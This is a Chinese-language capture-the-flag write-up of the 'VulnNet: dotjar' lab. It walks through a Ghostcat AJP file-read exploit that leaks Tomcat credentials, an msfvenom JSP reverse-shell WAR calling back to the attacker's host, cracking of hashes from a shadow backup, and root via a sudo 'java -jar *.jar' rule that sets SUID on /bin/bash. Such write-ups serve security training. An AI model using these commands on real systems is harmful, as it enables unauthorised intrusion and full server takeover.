Skip to main content

VulnNet: dotjar

端口扫描

root@ip-10-10-20-92:~# nmap -sTCV -p- --min-rate 1000 10.10.99.153
Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-05 09:57 BST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for ip-10-10-99-153.eu-west-1.compute.internal (10.10.99.153)
Host is up (0.0054s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http    Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.30
MAC Address: 02:FF:C1:D7:81:19 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.13 seconds

8080

根据扫描结果显示是 Apache Tomcat 9.0.30 并且开启了 8009 ajp 协议, 我记得这个搭配是存在任意文件读取漏洞的所以我直接找了 EXP 开始利用 CNVD-2020-10487-Tomcat-Ajp-lfi

root@ip-10-10-20-92:~/vulnnetdotjar/CNVD-2020-10487-Tomcat-Ajp-lfi# python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 10.10.99.153 -p 8009 -f WEB-INF/web.xml
....
     VulnNet Dev Regulations - mandatory
 
1. Every VulnNet Entertainment dev is obligated to follow the rules described herein according to the contract you signed.
2. Every web application you develop and its source code stays here and is not subject to unauthorized self-publication.
-- Your work will be reviewed by our web experts and depending on the results and the company needs a process of implementation might start.
-- Your project scope is written in the contract.
3. Developer access is granted with the credentials provided below:
 
    webdev:Hgj3LA$02D$Fa@21
 
GUI access is disabled for security reasons.
 
4. All further instructions are delivered to your business mail address.
5. If you have any additional questions contact our staff help branch.
  </description>

</web-app>

从上述输出中我们可以确定以下内容:

  • 一个后台登陆账号 : webdev:Hgj3LA$02D$Fa@21
  • 禁用了GUI 访问, 如果你尝试使用浏览器访问 Tomcat 的管理页面你会发现 403 而且无法绕过

我本来想的是服务端基于 User-Agent 的检测, 但是尝试一圈后发现没有办法绕过, 所以转换思路直接使用命令行操作上传, 万幸 GPT 告诉了我上传的 URL , 所以创建我们的 war 文件并进行上传

root@ip-10-10-20-92:~/vulnnetdotjar# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.20.92 LPORT=4444 -f war > shell.war

image-20240709181709039

后渗透

web

开启监听并进行等待我们就可以获取到一个 Shell

image-20240709181721006

web —> jdk-admin

在 var 目录下搜索时我发现一个特殊的备份文件

(remote) web@vulnnet-dotjar:/var$ ls -al backups/
total 2652
......
-rw-r--r--  1 root root       485 Jan 16  2021 shadow-backup-alt.gz
.....

我猜测这个文件中存在用户的密码, 所以将其下载到本地, 如果你遇到格式错误问题, 不妨先将其复制到 tmp 目录下再下载, 解压之后其中确实是 shadow 的文件, 并且其中存在 root 、jdk-admin、 web 的hash 所以解密

image-20240709181729087

使用得到的密码切换用户即可

jdk-admin —> root

我发现 jdk-admin 用户存在 SUDO 特权可以执行所有的 jar 程序

jdk-admin@vulnnet-dotjar:/tmp$ sudo -l
Matching Defaults entries for jdk-admin on vulnnet-dotjar:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jdk-admin may run the following commands on vulnnet-dotjar:
    (root) /usr/bin/java -jar *.jar

在这里我自己创建了一个自己的 jar 包, , 其作用是将 /bin/bash 赋予 SUID 权限, 将其进行上传并执行后确实完成了任务

image-20240709181737613